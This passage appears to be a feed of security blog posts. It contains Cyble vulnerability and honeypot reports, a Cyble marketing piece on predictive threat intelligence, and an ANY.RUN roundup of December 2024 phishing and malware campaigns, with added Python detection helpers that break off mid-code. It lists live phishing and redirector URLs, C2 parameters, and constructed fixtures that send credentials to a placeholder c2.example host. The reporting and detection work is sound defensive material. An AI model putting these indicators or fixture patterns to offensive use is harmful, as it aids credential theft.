IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More

Overview

Cyble’s December 19 IT vulnerability report to clients highlighted nine vulnerabilities at high risk of attack, including five under active discussion on dark web forums.

Cyble vulnerability intelligence and dark web researchers also noted threat actor claims of zero-day vulnerabilities for sale affecting Palo Alto Networks devices and Chrome and Edge browsers.

In total, Cyble researchers examined 13 vulnerabilities and 8 dark web exploits to arrive at the list of vulnerabilities that security teams should prioritize for patching. At-risk products include Apache Struts, Qualcomm digital signal processors (DSPs), a WordPress plugin, a Bluetooth flaw affecting Ubuntu, and more.

The Week’s Top Vulnerabilities

CVE-2024-53677: This file upload logic vulnerability in the Apache Struts web application framework has been rated 9.5 severity by the Apache Software Foundation but is still undergoing NVD analysis. An attacker could exploit the vulnerability to manipulate file upload parameters to enable path traversal and potentially upload a malicious file that could be used to perform remote code execution. Recently, researchers disclosed that threat actors are attempting to exploit the vulnerability using public proof-of-concept exploits to allow remote code execution, and exploitation has also been discussed on dark web forums. Cyble also published a separate blog on this vulnerability.

Cyble researchers noted that nearly 200,000 vulnerable Apache Struts instances are exposed to the internet (see image below).

CVE-2024-43047: This vulnerability affects Qualcomm’s Digital Signal Processor (DSP) service, which is used in many Android devices. It allows privilege escalation and arbitrary code execution, posing significant risk to affected systems. Google Project Zero flagged the vulnerability as actively exploited in October 2024, and it received a fix on Android in November 2024. Researchers also observed that the Serbian government exploited Qualcomm zero-days, including CVE-2024-43047, to unlock and infect Android devices with a new spyware family named “NoviSpy.”

CVE-2024-11972: The CVE ID for this vulnerability has been reserved, but the record has not yet been published. The flaw affects the Hunk Companion WordPress plugin, which is designed to extend site functionality and help build visually appealing websites without extensive coding knowledge. The vulnerability allows attackers to perform unauthenticated plugin installation through unauthorized POST requests, enabling them to install and activate other plugins that may contain known vulnerabilities. According to researchers, attackers are exploiting the vulnerability to install outdated plugins with known flaws from the WordPress.org repository. This gives them access to vulnerabilities that can lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS), or the creation of backdoor admin accounts, posing significant risks to site security.

CVE-2023-45866: This medium-severity vulnerability affects Bluetooth HID Hosts in systems utilizing BlueZ, particularly in Ubuntu 22.04 LTS with the BlueZ 5.64-0ubuntu1 package. This vulnerability allows an unauthenticated peripheral HID device to initiate an encrypted connection, potentially enabling the injection of Human Interface Device (HID) messages without user interaction.

Vulnerabilities and Exploits on Underground Forums

Cyble Research and Intelligence Labs (CRIL) researchers also identified the following exploits and vulnerabilities discussed on Telegram channels and cybercrime forums, raising the risk that they will be exploited in attacks.

CVE-2024-28059: This critical security vulnerability, which was identified in the MyQ Print Server in versions prior to 8.2 (patch 43), allows remote attackers to gain elevated privileges on the target server.

CVE-2024-38819: This high-severity path traversal vulnerability in the Spring Framework specifically affects applications that utilize WebMvc.fn or WebFlux.fn functional web frameworks.

CVE-2024-35250: This high-severity privilege escalation vulnerability in the Microsoft Windows operating system specifically affects the kernel-mode driver.

CVE-2024-40711: This critical vulnerability identified in Veeam Backup & Replication software allows for unauthenticated remote code execution (RCE) due to deserialization of untrusted data.

CVE-2023-27997: This heap-based buffer overflow vulnerability in certain FortiOS and FortiProxy versions, affecting the SSL VPN component, may allow a remote attacker to execute arbitrary code or commands via specially crafted requests.

Threat actors were also observed offering a zero-day exploit weaponizing a vulnerability claimed to be present in Palo Alto Networks’ PAN-OS VPN-supported devices (asking price: $60,000) and a zero-day exploit weaponizing a vulnerability allegedly present in Chrome and Edge (asking price: $100,000).

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching exploitable vulnerabilities in sensitive products and vulnerabilities that could be weaponized as entry points for wider attacks. With increasing discussion of these exploits on dark web forums, organizations must stay vigilant and proactive.

Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents.

The post IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More appeared first on Cyble.

Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More

Overview

Cyble honeypot sensors detected dozens of vulnerabilities under attack in the threat intelligence leader’s most recent sensor intelligence report, including fresh attacks on an Ivanti vulnerability.

Threat actors also targeted vulnerabilities affecting PHP and the Ruby SAML library. Cyble’s Dec. 19 report noted that unpatched networks and IoT devices remain popular targets for hackers looking to breach networks and add to botnets.

The report also looked at Linux and Windows exploits, common brute-force attacks, and phishing campaigns.

Vulnerabilities Under Attack

Cyble detected fresh attacks on CVE-2024-7593, a critical authentication bypass vulnerability in the authentication algorithm implementation of Ivanti’s Virtual Traffic Manager (vTM), excluding versions 22.2R1 and 22.7R2. The 9.8-severity vulnerability can allow a remote, unauthenticated attacker to bypass admin panel authentication. It was added to CISA’s Known Exploited Vulnerabilities catalog in September, one of 11 Ivanti vulnerabilities CISA has added to the KEV catalog this year.

CVE-2024-4577 also remains under attack. The critical PHP vulnerability impacts CGI configurations and remains vulnerable in PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8. The 9.8-severity vulnerability enables attackers to execute arbitrary commands through specially crafted URL parameters.

CVE-2024-45409, a vulnerability in the Ruby SAML library designed for implementing the client side of SAML authorization, also remains a frequent target for hackers. In versions 1.12.2 and earlier, and 1.13.0 to 1.16.0, the library fails to verify the signature of SAML Responses properly. The flaw allows an unauthenticated attacker with access to a signed SAML document (issued by the IdP) to forge a SAML Response or Assertion with arbitrary contents, enabling unauthorized login as any user within the affected system. The issue has been resolved in versions 1.17.0 and 1.12.3.

Network and IoT Devices Under Attack

Network and IoT devices remain particularly popular with threat actors, as they can provide entry points into networks as well as additional nodes in a botnet. With many devices with vulnerabilities from 2023 and earlier still unpatched, Cyble noted that the following network vulnerabilities remain particularly popular with attackers:

CVE-2023-20198, a 10.0-severity vulnerability in the web UI feature of the Cisco IOS XE operating system, is being chained with CVE-2023-20273 to gain root privileges in vulnerable devices.

CVE-2023-4966 is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateways when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

CVE-2023-1389 is a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface of TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

CVE-2023-46747 could allow undisclosed requests in F5 BIG-IP to bypass the configuration utility authentication, allowing an attacker with network access to the system through the management port and/or self-IP addresses to execute arbitrary system commands.

Vulnerabilities in real-time operating systems (RTOS) and embedded devices remain extremely popular with attackers, exposing operational technology (OT) networks with vulnerable devices to attack.

One last vulnerability hackers keep returning to is CVE-2023-47643, an unauthorized GraphQL Introspection vulnerability in the SuiteCRM Customer Relationship Management (CRM) system in versions before 8.4.2. The flaw allows an attacker to access the GraphQL schema without authentication, revealing all object types, arguments, functions, and sensitive fields such as UserHash. By understanding the exposed API attack surface, attackers can exploit this information to access sensitive data.

Linux systems remain continually under attack by CoinMiner, Mirai Botnet, and IRCBot malware, while hundreds of WannaCry ransomware samples continue to be detected each week in Windows 10, Windows Server 2016, and older systems vulnerable to CVE-2017-0147.

Remote Protocols Targeted in Brute-Force Attacks

Remote access protocols, particularly VNC (port 5900), remain popular targets of brute-force attacks. Examining the ports most targeted by the top five attacker countries, attacks originating from the United States targeted ports 5900 (42%), 22 (36%), 3389 (14%), 80 (5%), and 23 (3%). Attacks originating from Russia targeted ports 5900 (81%), 445 (7%), 22 (5%), 23 (3%), and 1433 (3%). Attacks from the Netherlands, Jordan, and China mainly targeted ports 5900, 22, and 445.

Security analysts are advised to add security system blocks for frequently attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).

New Phishing Campaigns Detected

Cyble detected 277 new scam and phishing email addresses in the most recent weekly report. Here are six notable ones, including subject lines:

| E-mail Subject | Scammer’s Email ID | Scam Type | Description |
|---|---|---|---|
| Are you interested in investment | Dave@oig.com | Investment scam | Unrealistic investment offers to steal funds or data |
| UN Compensation Fund. | zagranica@usa.com | Claim scam | Fake compensation fund claim |
| COMPENSATION FUND OF 5.5 MILLION DOLLARS. | Info@uba.org | Claim scam | Fake compensation fund email |
| Funding projects up to USD 5 Billion | noreply@order.eventbrite.com | Investment scam | Unrealistic investment offers to steal funds or data |
| HOTEL AND REAL ESTATE INVESTMENTS | richardowenr928@gmail.com | Investment scam | Fake hotel and real estate investment scam |
| My Donation | test@cinematajrobi.ir | Donation scam | Fake donation mail to steal money |

Recommendations and Mitigations

Cyble researchers recommend the following security controls:

  • Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).
  • Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
  • Continuously check for attackers’ ASNs and IPs.
  • Block brute-force attack IPs and the targeted ports listed above.
  • Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
  • For servers, set up strong passwords that are difficult to guess.

Conclusion

With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching wherever possible and applying mitigations where patching isn’t possible. The large number of brute-force attacks and phishing campaigns shows that attackers remain active even heading into the holiday season.

To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive, layered security approach will be key in defending against exploitation and data breaches.

The post Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More appeared first on Cyble.

Predictive Threat Intelligence – Predictions for 2025: The Future of CTI

Cybersecurity has long been an essential element of organizational defense, with the growing complexity and frequency of cyberattacks propelling the development of cybersecurity practices. Among these practices, Threat Intelligence (TI) has become a central element, helping organizations anticipate, understand, and counter various cyber threats. As we approach 2025, however, a new evolution in threat intelligence is emerging: Predictive Threat Intelligence (PTI).

While traditional Threat Intelligence (TI) focuses on collecting, analyzing, and sharing data on cyber threats after they occur, Predictive Threat Intelligence goes a step further. It uses advanced techniques, particularly AI (artificial intelligence) and machine learning (ML), to predict cyber threats before they materialize. This field holds great promise for proactively strengthening an organization’s cybersecurity posture by providing early warnings, reducing damage from potential attacks, and enabling defense strategies based on anticipatory insights.

What Is Cyber Threat Intelligence (CTI), and How Is It Different from Predictive Threat Intelligence (PTI)?

Cyber Threat Intelligence (CTI) is the practice of collecting, analyzing, and sharing data about cyber threats. By gaining insights into threat actors’ behavior and tactics, techniques, and procedures (TTPs), organizations can better understand potential cyber threats, allowing them to prepare, respond, and mitigate potential attacks.

Traditional Threat Intelligence tends to focus on reactive measures, where security teams analyze attack patterns after a breach or threat occurs. In contrast, Predictive Threat Intelligence (PTI) takes a more proactive stance. By leveraging AI and ML, PTI not only understands current cyber threats but also forecasts future attacks before they materialize.

Machine learning algorithms analyze large datasets, including historical threat data and emerging patterns, to predict the types of threats organizations might face in the near future. For example, if an AI model detects a surge in phishing attacks against a particular industry, it can alert organizations in that sector to prepare for a potential escalation in attacks. This predictive capability allows organizations to take precautionary measures before a threat becomes imminent.

Predictive Threat Intelligence enhances the traditional threat intelligence model by offering actionable, anticipatory insights that enable proactive security measures, such as patching vulnerabilities or reinforcing defenses against specific attack vectors before they are widely exploited. This shift from reactive to proactive cybersecurity is positioned to transform the way organizations approach risk management and threat mitigation.

Why Is Cyber Threat Intelligence (CTI) Important?

Understanding the importance of Cyber Threat Intelligence (CTI) is key to appreciating its role in the cybersecurity ecosystem. As cyberattacks become increasingly damaging, the need for effective threat intelligence grows. Without comprehensive CTI, organizations would be left scrambling to respond to attacks, often too late to prevent significant damage.

CTI provides essential insights into cyber threats, including information about threat actors, their motives, and the vulnerabilities they exploit. With this knowledge, organizations can develop more robust defense mechanisms and avoid becoming targets for specific types of attacks.

The most compelling reason for investing in CTI is its ability to elevate organizational security beyond reactive measures. By enabling organizations to recognize online threats early, CTI empowers security teams to adopt a proactive security posture. Proactive defense strategies allow vulnerabilities to be patched before they can be exploited and preparations to be made for impending threats, all of which contribute to reducing the overall risk of a breach.

How Does Predictive Threat Intelligence Work?

Predictive Threat Intelligence works by combining AI, machine learning, and advanced analytics to analyze vast amounts of historical and real-time threat data. By understanding the TTPs of cyber adversaries, these tools can identify patterns that signal emerging threats. Here’s how it works in practice:

  1. Data Collection: Predictive threat intelligence platforms collect data from diverse sources, including the surface web, deep web, and dark web, as well as intelligence from private threat-sharing organizations and public cybersecurity resources. These datasets provide crucial insights into potential vulnerabilities and attack vectors.
  2. Data Processing and Analysis: AI models and machine learning algorithms process the collected data, identifying potential threats based on historical attack patterns and emerging trends. For instance, if a surge in phishing attacks targeting a specific industry is detected, AI models can recognize similar characteristics or tactics that might indicate future attacks.
  3. Threat Forecasting: Predictive intelligence platforms then forecast potential threats based on identified trends. For example, AI can predict that a new form of ransomware is gaining traction among cybercriminals, alerting organizations to prepare for a possible attack.
  4. Proactive Response: Once potential threats are identified, the predictive system provides actionable intelligence to help organizations bolster their defenses. These measures could include patching known vulnerabilities, updating defense strategies, and alerting stakeholders to prepare for specific attack scenarios.

The Role of Artificial Intelligence and Machine Learning in Predictive Threat Intelligence

While Predictive Threat Intelligence (PTI) involves more than just AI, artificial intelligence and machine learning play a crucial role in its development. AI’s strength lies in its ability to analyze massive volumes of data, recognize patterns, and make predictions about future events, including cyberattacks.

However, despite the potential, AI and ML alone are not enough to guarantee a fully predictive threat intelligence model. Predictive intelligence is complex, and building reliable, actionable insights requires a balanced integration of human intelligence and automated systems.

The role of AI and machine learning in predictive intelligence includes:

  • Threat Detection: AI can identify anomalous behavior in network traffic, suggesting potential attack attempts.
  • Risk Analysis: By analyzing attack vectors and patterns, AI models can prioritize potential risks based on the severity of the threats and their likelihood of occurring.
  • Automation: Machine learning models can automate certain security functions, such as scanning for vulnerabilities and patching security gaps, without the need for human intervention.

The Challenge of Implementing Predictive Threat Intelligence

While predictive threat intelligence is a highly promising approach, it faces several challenges, especially in terms of implementation.

  1. Data Availability: One of the primary hurdles is the availability of quality data. AI and machine learning models require large, diverse datasets to learn and predict threats accurately. However, data is often fragmented and may not be available in a standardized format, making it difficult for predictive systems to integrate and analyze it effectively.
  2. Complexity of Predictive Models: Predicting future threats is an inherently complex task. As with any prediction, there is a degree of uncertainty, and not every forecast will be accurate. The dynamic nature of cybersecurity means that there will always be a level of unpredictability when it comes to forecasting attacks.
  3. Human Expertise: Although AI and machine learning are powerful tools, human expertise is still necessary to interpret the data and provide context. Human analysts play a critical role in identifying nuanced threats and validating AI predictions to ensure the intelligence is actionable.
  4. Data Privacy and Sharing: Threat intelligence requires data from multiple sources, including potentially sensitive or confidential data. Therefore, sharing threat intelligence can raise privacy concerns, especially in industries like finance or healthcare. Developing systems that allow for safe and ethical sharing of threat data is essential for the success of PTI.

The Future of Predictive Threat Intelligence in 2025

As we look toward 2025, the role of Predictive Threat Intelligence (PTI) in cybersecurity will become increasingly important. By predicting threats before they materialize, PTI will enable organizations to stay one step ahead of cybercriminals, minimizing the risks of cyber threats.

In the near future, advancements in AI-powered threat intelligence will allow organizations to:

  • Improve the automation of cybersecurity workflows, enabling faster, more accurate threat detection and mitigation.
  • Enhance the integration of AI and human expertise, creating a more effective hybrid threat intelligence model.
  • Develop better predictive models that consider a wider array of threat actors and attack vectors, leading to more accurate forecasts.
  • Better share threat intelligence across industries, increasing collaboration and improving overall cybersecurity resilience.

Cyble, an industry leader in Cyber Threat Intelligence, has been at the forefront of this evolution. Cyble’s Cyber Threat Intelligence Platform provides real-time insights into potential threats, combining historical threat data with AI-driven analysis to deliver actionable, predictive intelligence. By integrating diverse data sources, Cyble enables organizations to identify potential threats, prioritize risks, and take proactive measures to mitigate potential breaches.

Why Choose Cyble?

Cyble offers a comprehensive cyber threat intelligence solution that empowers organizations to tackle cyber threats more effectively. With features like dark web monitoring, vulnerability management, and AI-driven analysis, Cyble helps companies not only detect threats but also predict and prevent them before they cause damage.

Cyble’s platform integrates seamlessly with your existing security infrastructure, enabling you to:

  • Gather intelligence from various sources, including the deep and dark web, to identify emerging threats.
  • Augment data with contextual insights for better decision-making.
  • Receive timely notifications about potential threats and vulnerabilities, enabling proactive defense strategies.

Cyble is ready to help businesses understand and navigate this dynamic landscape and stay protected against cyber threats in 2025 and beyond.

Conclusion: Stay Ahead with Cyble

Predictive Threat Intelligence is the future of threat intelligence. By leveraging advanced technologies like AI and machine learning, organizations can anticipate threats before they emerge, minimizing the damage caused by cyberattacks. As we move towards 2025, Predictive Threat Intelligence will be an essential tool in every cybersecurity strategy.

If you want to strengthen your organization’s defenses and stay protected from upcoming threats, Cyble’s threat intelligence platform is your go-to solution. Schedule a demo today and discover how Cyble can help you proactively secure your assets against the threats of tomorrow.

The post Predictive Threat Intelligence – Predictions for 2025: The Future of CTI appeared first on Cyble.

5 Major Cyber Attacks in December 2024

The cybersecurity research team of ANY.RUN found and analyzed a bunch of emerging threats with the help of our mighty Interactive Sandbox and Threat Intelligence Lookup.

We’ve been sharing their findings via X and in our blog. Here is a summary of the most interesting insights from December 2024.

Phishing Campaigns targeting Microsoft’s Azure Blob Storage

Original post on X

Phishing page: HTML document with a characteristic attribute

Cyber criminals are abusing Microsoft’s cloud-based file storage solution by hosting phishing pages on the service, employing techniques like HTML smuggling.

The phishing pages are HTML documents that contain a block input element with the ID attribute “doom”. The pages include information about users’ software obtained via JScript (OS and browser), to make them more convincing.

Phishing pages on Azure Blob Storage typically have a short lifespan. Attackers may host pages with redirects to phishing sites. With minimal suspicious content, these pages can evade detection slightly longer.

See the analysis session in the ANY.RUN sandbox.

User’s credentials get stolen from fake sign-in form
  • Threat actors leverage the *.blob.core.windows[.]net subdomain to store documents.
  • Company logos are extracted using email address parsing and loaded from the logo[.]clearbit[.]com service.
  • To collect and store stolen data, an HTTP POST request is sent to nocodeform[.]io for collecting form submissions.
AI-generated summary of the attack in the sandbox
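A triage helper for the Azure Blob Storage phishing pages described above, added here as an example (not ANY.RUN’s code). It parses an HTML document and reports the indicators the post lists: an input element with the id “doom”, a form or script that posts to nocodeform[.]io, a logo pulled from logo[.]clearbit[.]com, a page hosted on *.blob.core.windows[.]net, and inline script that reads browser/OS details. The sample page is constructed for the example.

```python
"""Scan an HTML page for the Azure Blob phishing fingerprint (added example)."""
from html.parser import HTMLParser
import re

# Indicators taken from the report (defanging brackets removed for matching).
DOOM_INPUT_ID = "doom"
FORM_SINK_HOST = "nocodeform.io"
LOGO_HOST = "logo.clearbit.com"
BLOB_HOST_SUFFIX = ".blob.core.windows.net"


class PhishIndicatorParser(HTMLParser):
    """Collects element ids, referenced URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.input_ids = []
        self.urls = []          # every src/href/action value seen
        self.script_text = []   # inline <script> bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("id"):
            self.input_ids.append(attrs["id"])
        for key in ("src", "href", "action"):
            if attrs.get(key):
                self.urls.append(attrs[key])
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def host_of(url):
    """Lower-cased host part of an absolute URL, or '' for relative paths."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def scan_page(html, page_url=""):
    """Return a dict of boolean indicators plus a simple score (count of hits)."""
    p = PhishIndicatorParser()
    p.feed(html)
    script_blob = "\n".join(p.script_text)
    # URLs referenced inside inline script (fetch/XHR targets) count as well.
    script_urls = re.findall(r"https?://[^\s'\"<>]+", script_blob)
    hosts = {host_of(u) for u in p.urls + script_urls}

    findings = {
        "doom_input": DOOM_INPUT_ID in p.input_ids,
        "posts_to_nocodeform": FORM_SINK_HOST in hosts,
        "clearbit_logo": LOGO_HOST in hosts,
        "hosted_on_blob": host_of(page_url).endswith(BLOB_HOST_SUFFIX),
        "fingerprints_browser": bool(
            re.search(r"navigator\.(userAgent|platform)", script_blob)),
    }
    findings["score"] = sum(1 for v in findings.values() if v is True)
    return findings


# Constructed sample page reproducing the fingerprint from the report.
SAMPLE_PAGE = """<html><body>
<img src="https://logo.clearbit.com/example.com">
<form action="https://nocodeform.io/f/constructed123" method="POST">
  <input id="doom" type="hidden" name="meta">
  <input type="email" name="login"><input type="password" name="passwd">
</form>
<script>
  document.getElementById("doom").value = navigator.userAgent + "|" + navigator.platform;
</script>
</body></html>"""

# Constructed hosting URL; the storage account name is a placeholder.
SAMPLE_URL = "https://placeholderacct.blob.core.windows.net/web/index.html"

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE, SAMPLE_URL))
```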

Use the following Threat Intelligence Lookup query to find threats targeting the set of requested domains:

See the Tasks tab in the search results for sandbox sessions with malicious URLs

And this search request to find links to HTML pages hosted on Azure Blob Storage.


Microsoft’s OneDrive also fell victim to HTML Blob Smuggling Campaign

The original post on X

As in the attack above, threat actors make victims believe they are logging into a legitimate platform.

Phishing page disguised as OneDrive login form

Using ANY.RUN’s MITM feature, we extracted base.js from the traffic and decoded it. The attack begins with a lure placed on OneDrive. After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.

Stolen credentials are sent via an HTTP POST request to the C2 server.

Attack details: image sources, stolen data route

The website’s design, background, and icons are stored on IPFS, while lure images, mimicking real services, are hosted on imgur[.]com.

View the attack unfold in the wild: one, other, or yet another sandbox session.


Phishing links in Microsoft Dynamics 365 web forms

Original post on X

Once again, a Microsoft service is being used for malicious activity. Phishers create forms with embedded links on *.microsoft.com subdomains. The links that users receive look legitimate, so people feel safe opening them.

With TI Lookup, we uncovered a link that tricked users into attempting to access a non-existent PDF file hosted on a Microsoft website.

Phishing URL: hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUNVIzNlI5MEhCNlBPRFMwMklUV0JZVTkxVS4u

Malicious page looks like a document hosted within Microsoft service

Use this simple query for TI Lookup to find attacks employing this technique and view them unveiled in our sandbox.

URLs engaged in the attack, found by TI Lookup

Anatomy of a fresh LogoKit

Original post on X

LogoKit is a comprehensive set of phishing tools known for using services that offer logos and screenshots of target websites. Our team has studied how such an attack unfolds.

Icons, pictures, backgrounds, forms: LogoKit-powered fake page

Let’s look at the example run in our sandbox.

  • The company’s logo is fetched from a legitimate logo storage service: hxxps://logo.clearbit[.]com/<Domain>.
  • The background is retrieved via request to a website screenshot service, using the following template: hxxps://thum[.]io/get/width/<DPI>/https://<Domain>.
  • The domain chain is led by a decoder-redirector: hxxps://asiangrocers[.]store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20. It is a fake Asian food store website built on a WordPress template, with a domain age of around four years. The template contains email addresses filled with typos.

The decoder-redirector shields the page from analysis and redirects the victim to the actual phishing page.

In our example, the real content of the phishing page and the associated scripts are hosted on the Cloudflare Pages platform. They are stored in the assets/ folder, which contains styles, images, and scripts.

Three scripts with random 10-character names are designed to protect the page from analysis and send stolen data to the threat actors:

  • assets/js/e0nt7h8uiw[.]js
  • assets/js/vddq2ozyod[.]js
  • assets/js/j3046eqymn[.]js

The stolen authentication data is sent to a remote Command and Control server controlled by the attackers via an HTTP POST request containing the following parameters: fox=&con=
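A detection helper for the LogoKit chain described above, added here as an example (not ANY.RUN’s code). It decodes the base64 query value carried by the decoder-redirector (the parameter quoted above decodes to a victim e-mail address), then correlates, per client, the follow-on requests the kit makes for that victim’s domain: the logo.clearbit.com logo fetch, the thum.io screenshot fetch, scripts named assets/js/<10 random characters>.js, and a POST whose body carries the fox=&con= parameters. The proxy-log format, the Cloudflare Pages hostname and the collector hostname are constructed for the example.

```python
"""Correlate LogoKit-style request chains in proxy logs (added example)."""
import base64
import re
from urllib.parse import urlsplit, parse_qs

EMAIL_RE = re.compile(r"^[^@\s]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})$")
# Script names observed in the report were 10 lowercase alphanumerics.
ASSET_JS_RE = re.compile(r"/assets/js/[a-z0-9]{10}\.js$")


def decode_b64_param(value):
    """Decode a possibly unpadded (url-safe or standard) base64 string, else None."""
    padded = value + "=" * (-len(value) % 4)
    for decoder in (base64.urlsafe_b64decode, base64.b64decode):
        try:
            return decoder(padded).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def victim_from_redirector(url):
    """Return (email, domain) if any query value of the URL decodes to an e-mail."""
    for values in parse_qs(urlsplit(url).query).values():
        for v in values:
            decoded = decode_b64_param(v)
            m = EMAIL_RE.match(decoded or "")
            if m:
                return decoded, m.group(1).lower()
    return None, None


def detect_logokit_chain(log_text):
    """Per client, list the LogoKit steps seen after a decodable redirector hit.

    Log line format (constructed): "<client> <method> <url> [<post-body>]".
    """
    sessions = {}
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue
        client, method, url = parts[0], parts[1], parts[2]
        body = parts[3] if len(parts) == 4 else ""
        s = sessions.setdefault(client, {"victim": None, "domain": None, "steps": []})
        split = urlsplit(url)
        host, path = (split.hostname or ""), split.path

        email, domain = victim_from_redirector(url)
        if email and s["victim"] is None:
            s["victim"], s["domain"] = email, domain
            s["steps"].append("redirector")
            continue

        d = s["domain"]
        if d and host == "logo.clearbit.com" and path == f"/{d}":
            s["steps"].append("clearbit_logo")
        elif d and host == "thum.io" and path.startswith("/get/width/") \
                and path.endswith(f"https://{d}"):
            s["steps"].append("thumio_screenshot")
        elif ASSET_JS_RE.search(path):
            s["steps"].append("random_asset_js")
        elif method == "POST" and {"fox", "con"} <= set(
                parse_qs(body, keep_blank_values=True)):
            s["steps"].append("fox_con_post")
    return {c: s for c, s in sessions.items() if s["victim"]}


# Constructed log excerpt. The redirector URL and script names come from the
# report; lure-page.pages.dev and c2.example are placeholder hosts, and the
# POST body values are placeholders (the report only names the parameters).
SAMPLE_LOG = """\
10.0.0.7 GET https://asiangrocers.store/fri/?haooauvpco=bWlubmllQGRpc25leS5jb20
10.0.0.7 GET https://logo.clearbit.com/disney.com
10.0.0.7 GET https://thum.io/get/width/1200/https://disney.com
10.0.0.7 GET https://lure-page.pages.dev/assets/js/e0nt7h8uiw.js
10.0.0.7 GET https://lure-page.pages.dev/assets/js/vddq2ozyod.js
10.0.0.7 POST https://c2.example/submit.php fox=PLACEHOLDER&con=PLACEHOLDER
10.0.0.9 GET https://intranet.example/?page=2
"""

if __name__ == "__main__":
    for client, session in detect_logokit_chain(SAMPLE_LOG).items():
        print(client, session["victim"], session["steps"])
```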

Manufacturers, beware: an attack combining Lumma and Amadey is targeting you

Cybercriminals’ tactics against the manufacturing industry have recently been shifting from data encryption to seizing control over critical infrastructure and stealing sensitive information.

The consequences of such attacks can be severe, leading to theft of intellectual property, disruption of operations, financial losses, and compliance violations. Businesses need to take the threat seriously, understand it, and prepare for it.

Attack used Emmenhtal loader to facilitate infection

This December, we have analyzed a new attack aimed at industrial market players. The mechanics are based on Lumma Stealer and Amadey Bot. The former hunts for valuable information, the latter takes control over the infected systems. View analysis.

  • It all starts with phishing emails with URLs leading users to download LNK files disguised as PDFs;
  • The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded;
  • PowerShell and Windows Management Instrumentation (WMI) commands are utilized to collect detailed information about the victim’s system.
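Added example, not ANY.RUN's code: three process-creation rules run over constructed Sysmon-style events, covering the chain above (ssh.exe acting as the launcher for PowerShell, a CPL executed from a user-writable path, and WMI system profiling from PowerShell or wmic). Paths and file names in the sample events are placeholders, not indicators from the analysed session.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields used by the rules below."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Locations an unprivileged user can write to; a CPL run from here is a downloaded one.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
# PowerShell or wmic querying Win32_* classes: the system-profiling step of the chain.
WMI_RECON_RE = re.compile(r"(Get-WmiObject|Get-CimInstance|\bwmic(?:\.exe)?\b).*Win32_",
                          re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def ssh_launches_powershell(ev: ProcessEvent) -> bool:
    """ssh.exe (the LNK target) acting as a launcher for PowerShell (step 2 above)."""
    return _basename(ev.parent_image) == "ssh.exe" and _basename(ev.image) in POWERSHELL


def cpl_from_user_writable_path(ev: ProcessEvent) -> bool:
    """Control-panel item loaded from a user-writable directory (the downloaded CPL)."""
    return (_basename(ev.image) in {"control.exe", "rundll32.exe"}
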